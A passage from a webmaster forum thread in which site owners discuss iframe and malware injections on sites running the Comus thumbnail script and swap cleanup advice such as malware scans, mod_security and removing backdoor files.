                                                                                      Icq: 14420613
                                                                                      • Mar 2001
                                                                                      • 15431

                                                                                      #43
                                                                                      i think you might need a managed host.
                                                                                      Need WebHosting ? Email me for some great deals [email protected]

                                                                                      • boneless
                                                                                        Confirmed User
                                                                                        • Dec 2002
                                                                                        • 3625

                                                                                        #44
                                                                                        Originally posted by escorpio
                                                                                        Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
                                                                                        I consider myself at this point the ex tech support of Comus. I worked for five years, and in the last year and the first year I had to cover for Tony a lot.

                                                                                        ATM this is where we stand: I'm not saying Comus is the prob, but it is most likely the cause of all probs.

                                                                                        The Comus license key admin login page file is broken ATM, one of the things that happened to my girlfriend's WordPress site during the hacks.

                                                                                        TBH with you guys, I myself am ditching Comus as my script and am going for an alternative. For now it's Smart Thumbs, and as I've got over 100 Comus sites I've got a long and hard task ahead to switch them all over.

                                                                                        I'm really hoping that all is well with Tony, but since I haven't heard from or seen him online in the past three weeks it makes me wonder what the fuck is going on.

                                                                                        I hope I'm not getting loaded with 1000s of messages on my ICQ...

                                                                                        Thanks y'all,

                                                                                        Ed
                                                                                        icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

                                                                                        • Major (Tom)
                                                                                          So Fucking Banned
                                                                                          • Nov 2003
                                                                                          • 32492

                                                                                          #45
                                                                                          Originally posted by asianseekerz
                                                                                          change your index page, delete the page having that code, then change all your access
                                                                                          Just a conjecture here, but that won't work. I've seen enough stuff attempted on my boxes and it's always a hole in the script. Remove the scripts and you're OK. It's not really an access thing. Changing the locks on your front door is pointless if you leave the windows open.
                                                                                          Duke

                                                                                          • beta-tester
                                                                                            Rock 'n Roll Baby!
                                                                                            • Sep 2004
                                                                                            • 22562

                                                                                            #46
                                                                                            I am not sure how you can be so sure that Comus is actually the root of your problems? I am using Comus too, but with tightened security on the server itself and with my OS security I never get hacked, nor get into trouble with any of my sites.

                                                                                            This time I haven't been affected by this Comus hack (which I think is not a Comus hack, just a malware insertion) and my sites are running smoothly.
                                                                                            The only thing I don't like about Comus is that its admin interface loads an iframe from their website, so if their website has the malware, then technically every site that runs Comus has it too.

                                                                                            To get rid of malware and to actually avoid getting it, just install a normal OS, like Linux, or buy a Mac.

                                                                                            Oh, and just one remark: before doing anything on your own, have your host run ClamAV on your box/virtual account and scan for potentially infected files, as well as run the rootkit detection tools. Then it's your turn to make your own box clean and more secure.

                                                                                            Good luck!

                                                                                            Sig for sale. Affordable prices. Contact me and get a great deal ;)

                                                                                            My contact:
                                                                                            ICQ: 944-320-46
                                                                                            e-mail: manca {AT} HotFreeSex4All.com

                                                                                            • Naughty-Pages
                                                                                              Confirmed User
                                                                                              • Oct 2006
                                                                                              • 4533

                                                                                              #47
                                                                                              Originally posted by Spudman
                                                                                              Dude, it's a Comus thumbs issue as far as I'm aware.
                                                                                              Agreed... it's Comus, but even after you kill Comus, you've got to check every site on the server Comus was on, even if the site is not using Comus... (I've got 14 sites so far that were affected.)

                                                                                              • tranza
                                                                                                ICQ: 197-556-237
                                                                                                • Jun 2003
                                                                                                • 57559

                                                                                                #48
                                                                                                Look at your .htaccess and check that everything is working nicely.
                                                                                                I'm just a newbie.

                                                                                                • Altwebdesign

                                                                                                  #49
                                                                                                  I've had this before!!
                                                                                                  Webair reverted my sites back to before the infection and changed all FTP info.

                                                                                                  • HEAT
                                                                                                    Confirmed User
                                                                                                    • Sep 2003
                                                                                                    • 2255

                                                                                                    #50
                                                                                                    Old thread. Yes, I was wrong. It's a Comus thumbs hack. No FTP password issue.
                                                                                                    I misunderstood; it was another iframe injection attack that was caused by viruses on the local machine. I installed mod_security and then the code injection stopped, but I thought it was fixed by removing the viruses on my PC.

                                                                                                    Anyway, it's completely fixed by removing all backdoor scripts and infected files.
                                                                                                    If anyone still faces this problem, refer to this thread.
                                                                                                    http://www.gfy.com/showthread.php?t=928915
                                                                                                    254-282-542
